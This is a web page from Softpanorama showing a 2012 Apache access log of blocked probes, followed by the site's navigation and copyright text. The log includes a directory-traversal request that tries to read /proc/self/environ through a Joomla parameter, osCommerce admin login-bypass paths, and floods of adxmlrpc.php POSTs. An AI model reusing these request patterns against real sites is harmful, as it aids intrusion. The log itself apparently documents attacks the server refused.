95.173.185.22 - - [29/Aug/2012:06:36:10 -0700] "GET /WWW//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
5.39.112.251 - - [29/Aug/2012:06:47:22 -0700] "GET /Scripting/Shellorama/dotfiles.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/Shellorama/dotfiles.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:07:44:52 -0700] "GET /People/index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/People/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:07:47:32 -0700] "GET /Education/SAT/Strategy/multiple_choice_questions_exam_strategies.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Education/SAT/Strategy/multiple_choice_questions_exam_strategies.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
131.253.46.202 - - [29/Aug/2012:07:54:19 -0700] "GET /Lang/java.shtml/templates/errors.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.39.112.251 - - [29/Aug/2012:08:14:11 -0700] "GET /Admin/system_monitoring.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Admin/system_monitoring.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:08:21:33 -0700] "GET /Solaris/certification.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Solaris/certification.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:08:27:00 -0700] "GET /Solaris/solaris_compilation_problems.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Solaris/solaris_compilation_problems.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
72.252.249.34 - - [29/Aug/2012:08:31:04 -0700] "GET /Utilities/vmstat.shtml/admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:31:04 -0700] "GET /admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:31:17 -0700] "GET /Utilities/vmstat.shtml/admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:31:17 -0700] "GET /admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:32:04 -0700] "GET /Utilities/vmstat.shtml/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:32:04 -0700] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
72.252.249.34 - - [29/Aug/2012:08:32:04 -0700] "GET /Utilities/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
5.39.112.251 - - [29/Aug/2012:08:39:24 -0700] "GET /index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
219.137.181.125 - - [29/Aug/2012:08:43:02 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
5.39.112.251 - - [29/Aug/2012:09:22:09 -0700] "GET /Skeptics/Pseudoscience/harvard_mafia.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Skeptics/Pseudoscience/harvard_mafia.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
78.145.139.206 - - [29/Aug/2012:09:59:34 -0700] "POST /Tools/mobiquo/mobiquo.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1"
87.253.162.11 - - [29/Aug/2012:10:19:04 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
205.189.73.122 - - [29/Aug/2012:10:39:19 -0700] "GET /register.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.78 Safari/535.11"
85.107.181.212 - - [29/Aug/2012:10:55:43 -0700] "POST /admin/administrators.php/login.php?action=insert HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
85.107.181.212 - - [29/Aug/2012:10:55:44 -0700] "POST /admin/login.php?action=process HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
5.39.112.251 - - [29/Aug/2012:11:18:10 -0700] "GET /Articles/note_on_the_relationship_of_brooks_law_and_conway_law.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Articles/note_on_the_relationship_of_brooks_law_and_conway_law.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
178.73.212.226 - - [29/Aug/2012:11:33:44 -0700] "GET /Scripting/php.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/php.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:11:42:05 -0700] "GET /History/cpu_history.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/History/cpu_history.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.9.198.245 - - [29/Aug/2012:11:43:27 -0700] "GET /Scripting/php.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/php.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:11:49:17 -0700] "GET /Security/social_sites_as_intelligence_collection_tools.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Security/social_sites_as_intelligence_collection_tools.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:11:53:58 -0700] "GET /Bulletin/sp2004h.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Bulletin/sp2004h.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
219.137.181.125 - - [29/Aug/2012:12:20:07 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
219.137.181.125 - - [29/Aug/2012:12:20:07 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
219.137.181.125 - - [29/Aug/2012:12:20:07 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
219.137.181.125 - - [29/Aug/2012:12:20:08 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
205.189.73.191 - - [29/Aug/2012:12:23:49 -0700] "GET /register.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.78 Safari/535.11"
5.39.112.251 - - [29/Aug/2012:12:36:53 -0700] "GET /Windows/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Windows/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:12:57:03 -0700] "GET /Utilities/touch.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Utilities/touch.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
219.137.181.125 - - [29/Aug/2012:13:12:57 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
157.55.33.181 - - [29/Aug/2012:13:32:51 -0700] "GET /Malware/Malicious_web/Bulletin/index.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.39.112.251 - - [29/Aug/2012:13:48:26 -0700] "GET /Education/social_problems_of_education.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Education/social_problems_of_education.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
46.246.88.137 - - [29/Aug/2012:13:53:44 -0700] "GET /Copyright/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Copyright/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:13:57:09 -0700] "GET /Scripting/python.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/python.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:13:59:33 -0700] "GET /Bulletin/sp2003h.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Bulletin/sp2003h.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
68.169.35.164 - - [29/Aug/2012:14:28:15 -0700] "GET /Commercial_linuxes/Suse/Security/launchpad_login.php HTTP/1.0" 403 82 "http://www.softpanorama.org/launchpad_login.php" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
82.247.105.227 - - [29/Aug/2012:15:15:08 -0700] "POST /Commercial_linuxes/Tips/mobiquo/mobiquo.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.6 (KHTML, like Gecko) Chrome/23.0.1243.2 Safari/537.6"
5.39.112.251 - - [29/Aug/2012:15:17:12 -0700] "GET /Utilities/script.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Utilities/script.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:15:31:42 -0700] "GET /Solaris/solaris_enterprize_strategy.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Solaris/solaris_enterprize_strategy.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:15:38:04 -0700] "GET /Admin/job_schedulers.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Admin/job_schedulers.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
222.231.2.134 - - [29/Aug/2012:16:03:13 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:14 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:15 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:15 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:15 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:16 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:16 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:16 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:17 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:17 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:18 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:03:18 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:26 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:27 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:27 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:27 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:27 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:28 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:28 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:28 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:29 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:29 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:30 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
222.231.2.134 - - [29/Aug/2012:16:06:30 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
108.171.246.242 - - [29/Aug/2012:16:29:43 -0700] "GET /pingserver.php HTTP/1.1" 403 82 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
108.171.246.242 - - [29/Aug/2012:16:29:43 -0700] "GET /WWW/pingserver.php HTTP/1.1" 403 82 "-" "gsa-crawler (Enterprise; GID-01422; jplastiras.com)"
5.39.112.251 - - [29/Aug/2012:16:32:46 -0700] "GET /Windows/direct_disk_editing.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Windows/direct_disk_editing.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
120.128.6.235 - - [29/Aug/2012:16:40:08 -0700] "GET /index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01  [en]"
120.128.6.235 - - [29/Aug/2012:16:40:20 -0700] "GET /index.php HTTP/1.0" 403 82 "http://www.softpanorama.org/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01  [en]"
5.39.112.251 - - [29/Aug/2012:17:01:05 -0700] "GET /Copyright/License_classification/social_dynamics_of_BSD_and_GPL.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Copyright/License_classification/social_dynamics_of_BSD_and_GPL.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
217.73.229.210 - - [29/Aug/2012:17:08:58 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:08:58 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:08:59 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:08:59 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:08:59 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:00 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:00 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:00 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:01 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:01 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:01 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:02 -0700] "POST /About/Stats//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:02 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:02 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:03 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:03 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:03 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:04 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:04 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:04 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:05 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:05 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:05 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:06 -0700] "POST //adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:06 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:07 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:07 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:07 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:08 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:08 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:08 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:09 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:09 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:09 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:10 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
217.73.229.210 - - [29/Aug/2012:17:09:10 -0700] "POST /About//adxmlrpc.php HTTP/1.1" 403 82 "-" "Microsoft Pocket Internet Explorer/0.6"
95.31.3.173 - - [29/Aug/2012:18:34:42 -0700] "GET /WWW/index.php?do=basic HTTP/1.1" 403 82 "http://www.softpanorama.org/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"

Recommended Links

Google matched content

Softpanorama Recommended

Top articles

Sites

Internal links



Etc

Society

Groupthink : Two Party System as Polyarchy : Corruption of Regulators : Bureaucracies : Understanding Micromanagers and Control Freaks : Toxic Managers :   Harvard Mafia : Diplomatic Communication : Surviving a Bad Performance Review : Insufficient Retirement Funds as Immanent Problem of Neoliberal Regime : PseudoScience : Who Rules America : Neoliberalism  : The Iron Law of Oligarchy : Libertarian Philosophy

Quotes

War and Peace : Skeptical Finance : John Kenneth Galbraith :Talleyrand : Oscar Wilde : Otto Von Bismarck : Keynes : George Carlin : Skeptics : Propaganda  : SE quotes : Language Design and Programming Quotes : Random IT-related quotesSomerset Maugham : Marcus Aurelius : Kurt Vonnegut : Eric Hoffer : Winston Churchill : Napoleon Bonaparte : Ambrose BierceBernard Shaw : Mark Twain Quotes

Bulletin:

Vol 25, No.12 (December, 2013) Rational Fools vs. Efficient Crooks The efficient markets hypothesis : Political Skeptic Bulletin, 2013 : Unemployment Bulletin, 2010 :  Vol 23, No.10 (October, 2011) An observation about corporate security departments : Slightly Skeptical Euromaydan Chronicles, June 2014 : Greenspan legacy bulletin, 2008 : Vol 25, No.10 (October, 2013) Cryptolocker Trojan (Win32/Crilock.A) : Vol 25, No.08 (August, 2013) Cloud providers as intelligence collection hubs : Financial Humor Bulletin, 2010 : Inequality Bulletin, 2009 : Financial Humor Bulletin, 2008 : Copyleft Problems Bulletin, 2004 : Financial Humor Bulletin, 2011 : Energy Bulletin, 2010 : Malware Protection Bulletin, 2010 : Vol 26, No.1 (January, 2013) Object-Oriented Cult : Political Skeptic Bulletin, 2011 : Vol 23, No.11 (November, 2011) Softpanorama classification of sysadmin horror stories : Vol 25, No.05 (May, 2013) Corporate bullshit as a communication method  : Vol 25, No.06 (June, 2013) A Note on the Relationship of Brooks Law and Conway Law

History:

Fifty glorious years (1950-2000): the triumph of the US computer engineering : Donald Knuth : TAoCP and its Influence of Computer Science : Richard Stallman : Linus Torvalds  : Larry Wall  : John K. Ousterhout : CTSS : Multix OS Unix History : Unix shell history : VI editor : History of pipes concept : Solaris : MS DOSProgramming Languages History : PL/1 : Simula 67 : C : History of GCC developmentScripting Languages : Perl history   : OS History : Mail : DNS : SSH : CPU Instruction Sets : SPARC systems 1987-2006 : Norton Commander : Norton Utilities : Norton Ghost : Frontpage history : Malware Defense History : GNU Screen : OSS early history

Classic books:

The Peter Principle : Parkinson Law : 1984 : The Mythical Man-MonthHow to Solve It by George Polya : The Art of Computer Programming : The Elements of Programming Style : The Unix Hater’s Handbook : The Jargon file : The True Believer : Programming Pearls : The Good Soldier Svejk : The Power Elite

Most popular humor pages:

Manifest of the Softpanorama IT Slacker Society : Ten Commandments of the IT Slackers Society : Computer Humor Collection : BSD Logo Story : The Cuckoo's Egg : IT Slang : C++ Humor : ARE YOU A BBS ADDICT? : The Perl Purity Test : Object oriented programmers of all nations : Financial Humor : Financial Humor Bulletin, 2008 : Financial Humor Bulletin, 2010 : The Most Comprehensive Collection of Editor-related Humor : Programming Language Humor : Goldman Sachs related humor : Greenspan humor : C Humor : Scripting Humor : Real Programmers Humor : Web Humor : GPL-related Humor : OFM Humor : Politically Incorrect Humor : IDS Humor : "Linux Sucks" Humor : Russian Musical Humor : Best Russian Programmer Humor : Microsoft plans to buy Catholic Church : Richard Stallman Related Humor : Admin Humor : Perl-related Humor : Linus Torvalds Related humor : PseudoScience Related Humor : Networking Humor : Shell Humor : Financial Humor Bulletin, 2011 : Financial Humor Bulletin, 2012 : Financial Humor Bulletin, 2013 : Java Humor : Software Engineering Humor : Sun Solaris Related Humor : Education Humor : IBM Humor : Assembler-related Humor : VIM Humor : Computer Viruses Humor : Bright tomorrow is rescheduled to a day after tomorrow : Classic Computer Humor

The Last but not Least Technology is dominated by two types of people: those who understand what they do not manage and those who manage what they do not understand ~Archibald Putt. Ph.D


Copyright © 1996-2021 by Softpanorama Society. www.softpanorama.org was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

FAIR USE NOTICE This site contains copyrighted material the use of which has not always been specifically authorized by the copyright owner. We are making such material available to advance understanding of computer science, IT technology, economic, scientific, and social issues. We believe this constitutes a 'fair use' of any such copyrighted material as provided by section 107 of the US Copyright Law according to which such material can be distributed without profit exclusively for research and educational purposes.

This is a Spartan WHYFF (We Help You For Free) site written by people for whom English is not a native language. Grammar and spelling errors should be expected. The site contain some broken links as it develops like a living tree...

You can use PayPal to to buy a cup of coffee for authors of this site

Disclaimer:

